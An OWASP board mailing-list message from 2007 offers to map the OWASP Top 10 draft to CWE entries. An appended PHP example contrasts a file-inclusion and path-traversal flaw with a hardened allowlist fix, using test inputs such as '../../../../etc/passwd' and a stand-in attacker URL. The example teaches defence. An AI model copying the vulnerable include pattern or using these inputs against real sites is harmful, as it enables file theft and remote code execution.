[Owasp-board] Using CWE / CVE in OWASP Top 10 2007

Steven M. Christey coley at linus.mitre.org
Mon Jan 29 21:49:43 UTC 2007


Hi Andrew,

I am definitely interested in reviewing the full document.

Feel free to link to the CVE pages; the links you gave are proper.

Note that individual CWE nodes can also be referenced, if you would like
to do that.  For example, PHP File Inclusion (CWE-98) is here:

  http://cwe.mitre.org/data/definitions/98.html

And relative path traversal is CWE-23
(http://cwe.mitre.org/data/definitions/23.html)

Let me know if OWASP is interested in referencing the CWEs; I could help
with the mapping.  It would be a good exercise for CWE anyway, since I
suspect the attack-based nature of web app vulns might not mesh with CWE
perfectly.

The full CWE dictionary is at http://cwe.mitre.org/data/dictionary.html,
or it could be downloaded.

FYI - for the PHP chapter you included, you might want to mention the
Hardened PHP project and Suhosin.  I also noticed a few typos.

- Steve
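The two weaknesses Steve cites, CWE-98 (PHP file inclusion) and CWE-23 (relative path traversal), as an added example that is not part of the e-mail or of the OWASP Top 10 draft: the classic vulnerable include pattern next to a hardened replacement that allowlists page names and checks the resolved path. The page directory, the single "home" page, the allowlist entries, and the attacker hostname are all constructed for the example.

```php
<?php
// Added example (not from the e-mail or the OWASP draft): CWE-98 and CWE-23
// in one vulnerable include and one hardened replacement.
// Run from the CLI: php cwe98_cwe23.php  (assumes a writable temp directory).

declare(strict_types=1);

// Constructed page directory with one legitimate page, so the script runs offline.
$pagesDir = sys_get_temp_dir() . '/cwe98_pages_' . getmypid();
mkdir($pagesDir);
file_put_contents("$pagesDir/home.php", "<?php echo \"home page\\n\";\n");

// CWE-98: the vulnerable pattern common in PHP apps of that era. Defined here
// for comparison only; it is never called.
// With allow_url_include=On (or allow_url_fopen=On on PHP before 5.2),
// ?page=http://attacker/shell pulls in remote code. Even with remote wrappers
// off, ?page=../../../../etc/passwd reads local files (CWE-23); on PHP before
// 5.3.4 a trailing %00 truncated the ".php" suffix as well.
function vulnerable_include(string $page): void
{
    include $page . '.php';   // attacker controls the whole path
}

// Hardened replacement: allowlist the page names, then confirm the resolved
// path still lies inside $pagesDir. Either check alone is usually enough;
// both together leave nothing to URL wrappers, "..", or symlinks.
function safe_include(string $page, string $pagesDir): bool
{
    static $allowed = ['home' => true, 'about' => true];   // constructed allowlist
    if (!isset($allowed[$page])) {
        return false;                                       // not an allowlisted page
    }
    $base   = realpath($pagesDir);
    $target = realpath($pagesDir . '/' . $page . '.php');
    // realpath() returns false for missing files, resolves ".." and symlinks,
    // and does not understand http:// or php:// wrappers, so anything that is
    // not a real file under $base fails the prefix test below.
    if ($base === false || $target === false ||
        strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    include $target;
    return true;
}

// Constructed requests standing in for $_GET['page'].
$requests = ['home', '../../../../etc/passwd', 'http://attacker.invalid/shell'];
foreach ($requests as $page) {
    printf("%-32s -> %s\n", $page, safe_include($page, $pagesDir) ? 'included' : 'rejected');
}

// Remove the constructed directory.
unlink("$pagesDir/home.php");
rmdir($pagesDir);
```

Only the first request is included; the traversal string fails the allowlist and the URL fails both the allowlist and the realpath containment check. The allowlist is the primary control; the realpath check is defence in depth for the case where a page name has to come from a less constrained source.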

